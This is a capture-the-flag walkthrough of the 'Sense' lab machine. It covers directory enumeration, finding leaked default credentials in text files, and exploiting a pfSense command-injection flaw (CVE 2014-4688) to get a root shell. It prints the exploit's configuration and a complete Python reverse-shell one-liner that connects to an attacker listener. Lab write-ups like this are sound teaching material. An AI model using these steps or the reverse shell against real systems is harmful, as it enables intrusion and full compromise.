# Sense ## Service Enumeration `nmapAutomator.sh -H 10.10.10.60 -t all` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MadtxAQJa_x_PHbCkN2%2Fd8018fada8cb47bebb120004c84fea59.png?alt=media\&token=6690c8ba-2906-4f4c-88bb-573fbce72cee) There is a web service running on standard ports. It turns out to be a pfSense login page. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madtzz676cgA0Z4KQQz%2F28518b79313540228a42c30eb2b2ca7c.png?alt=media\&token=e1e68c30-5f65-41c8-ac79-b9f0710426d3) The initial subdirectory enumeration did not yield anything interesting. If we look for `.txt` and `.php` files, however, we find some more interesting files. `gobuster dir -u https://10.10.10.60 -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu1ZqlrXhFKHxkJZw%2F1a9d66d2db7e4722a6dc3942c6424f7e.png?alt=media\&token=a9a8447d-3294-488a-b74f-ff4672fe6981) The PHP pages will load the login page. However, we find a `changelog.txt`: ``` # Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window ``` Using a longer wordlist, `/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt`, we find another `.txt` file. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu4ZGrplWIJAwI_3n%2Fe937d8f73a0d4b12a0f4ed37e44f095e.png?alt=media\&token=b755e6c6-4907-4cf7-af84-a9fa5ef48c77) ``` ####Support ticket### Please create the following user username: Rohit password: company defaults ``` ## Exploitation The default credentials, `admin:pfsense` do not work. However, the `system-users.txt` file above indicated that a `Rohit` username exists, with a "company default" password. Using the credentials `rohit:pfsense`, we successfully authenticate into the web application. Here, we get more information on the system version. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu70-twPo0M7F9IBu%2F0f286e416183428f9bce07e7c2a00be0.png?alt=media\&token=38a379c4-c76a-40c8-b6db-7a95e0eb60cb) This version is vulnerable to CVE 2014-4688, a command injection vulnerability. Using code from , we can exploit the vulnerability. Change the configuration to suit our needs: ```python username = "rohit" password = "pfsense" listener_ip = "10.10.14.23" listener_port = "4444" target_ip = "10.10.10.60" ``` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-Madu9PzPn5FhAzvhe6Y%2Fe9f5613fb4bd459381238127554b7273.png?alt=media\&token=0b2681d9-29e9-4d28-8181-726dfb139d73) The service is running as root, so we get a root shell. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MaduC66GH2TanFovqFP%2Fdb264aad507c418d94d19ce98dd90a1b.png?alt=media\&token=8ab61416-1e90-4afd-9a46-6254dae3cb10) To upgrade to an interactive shell, we can catch the Python reverse shell on another terminal: `export RHOST="10.10.14.23";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-MadfalZSxAu1zpUubA2%2F-MaduEa6-sbFkLBUHWPg%2F2008b54a67ea4b0686b31344ee954655.png?alt=media\&token=dd5630ac-afcd-40ee-a02b-e871c173111f)